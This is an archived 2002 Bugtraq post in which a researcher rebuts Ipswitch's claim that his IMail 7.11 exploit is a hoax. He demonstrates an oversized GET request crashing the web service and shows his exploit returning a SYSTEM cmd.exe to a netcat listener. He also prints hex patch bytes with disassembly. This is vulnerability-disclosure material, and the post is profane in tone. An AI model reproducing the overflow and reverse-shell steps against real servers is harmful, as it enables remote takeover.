Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Hoax Exploit (2c79cbe14ac7d0b8472d3f129fa1df55 RETURNS)

From: "2c79cbe14ac7d0b8472d3f129fa1df55 2c79cbe14ac7d0b8472d3f129fa1df55" <x_2c79cbe14ac7d0b8472d3f129fa1df55 () hotmail com>
Date: Mon, 29 Jul 2002 19:54:20 +0000
uh, ok
first of all, I haven't been able to respond to any mail since saturday afternoon as some nice person/vendor filed a phony abuse report with the intelligent people of yahoo inc., and had my account suspended and banned.. if you sent any email since saturday, please resend it here.. I'm sure I'll have a week or so to read it before I am ABUSE REPORT H4XED..
first off, maybe the exploit isn't working on your system.. hmm, possible I guess?.. the described situation is still quite repeatable so what the hell: 

xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 Created
Date: Mon, 29 Jul 2002 19:20:41 GMT
Server: Ipswitch-IMail/7.11
Last-Modified: Mon, 29 Jul 2002 19:20:41 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires:
Content-Type: text/html
Content-Length: 5143

[....]


hmm, looks like IMail 7.11 to me? how about you?


xx@xxx:~$ telnet 192.168.0.2 8383
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
GET xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.0 

Connection closed by foreign host.


uh oh, that isn't supposed to happen!@ let's chex those logs!


20020729 162041 Info - 192.168.0.1   GET / HTTP/1.0.
20020729 162423 Info - 192.168.0.1 GET xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx. 20020729 162423 Web Error Problem in ThreadProc - Socket 380 on port 8383 from 192.168.0.1.
hey, look mom.. a dead thread! looks like an overflow to me, let's use that elite exploit I found on bugtraq!@ 


xx@xxx:~$ ./imailexp 192.168.0.2 8383 192.168.0.1 3333
IMail 7.11 remote exploit (SYSTEM level)
2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55 () yahoo com)

ret: 0x10012490 (IMailsec.dll v.2.6.17.28)

connecting...done.
dumping payload...done.

cmd.exe spawned to [192.168.0.1:3333]

xx@xxx:~$ nc -l -p 3333
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

D:\WINNT\system32>
seems to work fine to me.. what the hell is going on at ipswitch? is it time to fire someone?
as for the patch being a vulnerability.. the binary was compiled with the default switches using Borland C++ 5.5 so that's why it's large.. but it's the same damn source, so fuck the binary then.. compile from the source: 

char p1[] = {0x00,0x30};
//extend text section to make room for our code

char p2[] = {0xe8,0xa1,0x98,0x04,0x00,0x90};
//on a command request, CALL 4A345E;NOP
char p3[] = {0x81,0xbc,0x24,0x58,0x03,0x00,0x00,0x47,0x45,0x54,0x20,0x75,0x08,0xc6,0x84,0x24,0xb2,0x03,0x00,0x00,0x00,0x8d,0x85,0xf0,0xed,0xff,0xff,0xc3}; 
//disassembly below

.text:004A345E                 cmp     [esp+arg_354], 20544547h
.text:004A3469                 jnz     short loc_4A3473
//is the argument "USER"? no? get out of this shit
.text:004A346B                 mov     [esp+arg_3AE], 0
//yes? limit argument to 90 bytes
.text:004A3473 loc_4A3473: ; CODE XREF: sub_4A345E+Bj 
.text:004A3473                 lea     eax, [ebp-1210h]
//shit we ran over to get here
.text:004A3479                 retn

huh? looks like a backdoor to me..

@!$?@!?$@!?%2@$42144@!$@!%?@!$@!%?@!$,
2c79cbe14ac7d0b8472d3f129fa1df55



Hello,



In message 284465 there is an "exploit" of IMail Server from Ipswitch
listed.



http://online.securityfocus.com/archive/1/284465
We have been unable to duplicate the problem and the code attached to >the above message is unknown in nature. We suspect that the "patch" >released in the message is actually designed to open a vulnerability. >At this time we are advising our users that this advisory is a hoax >and to not apply the patch. I would like to request that the message >be removed to prevent further confusion. Thank you. 


John Korsak
Product Marketing Manager, IMail Server
(781) 676-5789




_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx
Previous By Date Next
Previous By Thread Next

Current thread: